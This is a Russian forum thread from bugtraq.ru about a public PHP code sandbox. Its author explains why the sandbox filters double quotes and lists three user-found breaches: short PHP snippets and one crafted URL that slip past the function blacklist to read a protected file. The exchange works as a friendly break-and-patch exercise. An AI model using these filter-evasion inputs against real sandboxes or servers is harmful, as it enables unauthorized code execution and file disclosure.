информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Notepad++ полгода раздавал зараженные...   Китайский прорыв из ESXi   С наступающим
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / web building		Имя Пароль

ФОРУМ все доски FAQ IRC новые сообщения site updates guestbook beginners sysadmin programming operating systems theory web building software hardware networking law hacking gadgets job dnet humor miscellaneous scrap регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. По традиции - иправлен и снова запущен 16.06.06 12:45  Число просмотров: 3263 Автор: xintrea Статус: Незарегистрированный пользователь <"чистая" ссылка> > subj. > > > и не взлом, вопрос по функционалу: > > ээ, а как ВООБЩЕ двойную кавычку напечатать-то? > $mamba = '"mama mia"'; > Без кавычки жизнь тугая вообще. Фак, что-то не добавилась мессага в форум, пешу второй раз. Двойные кавычки зпрещены впринципе, разрешены только одинарные, так как в двойных кавычках происходит парсинг содержимого на предмет вычленения значащих лексем. При этом, в токенах лексемы из строки с двойными кавычками невидны, поэтому сложно надежно определять опасные конструкции в таких строках. На данный момент сервис снова запущен. http://xi.net.ru/sandbox/webcode.php Для интересующихся - история взломов Взлом N1 Время: 08.06.06 12:22 Автор: Valyala Код: $a = 'file_get_contents'; echo ${'a'}('msg.txt'); Взлом N2 Время: 09.06.06 10:57 Автор: Paganoid Код: $lol = 'file_get_contents'; $mamba = 'lol'; echo $bad*/$mamba/*bad('msg.txt'); Взлом N3 Время: 14.06.06 10:09 Автор: Paganoid Код: Взлом через URL со специально искаженным кодом (использование символа 0Dh). http://xi.net.ru/sandbox/webcode.php?httpcodetext=//$%0Decho%20file_get_contents(%27msg.txt%27); <web building> Поиск  Страшный сон администратора уже реальность! - xintrea 08.06.06 12:39 [4357] Опа, по ходу дела уже взломали, щас разберуся как :) (-)  - xintrea 08.06.06 12:52 [3433] А что ты хотел, тут ребята толковые, 13 минут хват... (-)  - DPP 08.06.06 13:08 [3113] Да нет, дырку нашол товарищ с PhpClub.ru - xintrea 08.06.06 14:45 [3404] Ого. А что, все опасные функции не написали в disa... (-)  - ZloyShaman 08.06.06 19:59 [3145] А этого ненужно. - xintrea 08.06.06 23:14 [3166] Кстати, в PHP оказывается нет такой вещи как... - xintrea 09.06.06 01:23 [3221] В твоей затее вижу три варианта развития событий - paganoid 09.06.06 11:07 [3080] rtfm - ZloyShaman 09.06.06 01:29 [3145] Ок, посмотрим - xintrea 09.06.06 11:57 [3211] не прокатит ini_set - paganoid 09.06.06 12:16 [3464] Как например у меня. Тоже доступа на редактирование нету. - xintrea 09.06.06 12:49 [3250] Сервис снова в эфире. Ломаем дальше. - xintrea 08.06.06 16:17 [3294] Сервис снова взломан. Лови мыло. (-)  - paganoid 09.06.06 10:55 [3265] Сервис снова остановлен :) - xintrea 09.06.06 12:26 [3194] Сервис запущен. Добавлена история взломов. - xintrea 14.06.06 00:32 [3438] и снова взломан, лови мыло - paganoid 14.06.06 10:09 [3297] По традиции - иправлен и снова запущен - xintrea 16.06.06 12:45 [3263] Кстати говоря, вспомнилась одна аналогия с указанным... - HoverHell 14.06.06 10:04 [3212]

Copyright © 2001-2026 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach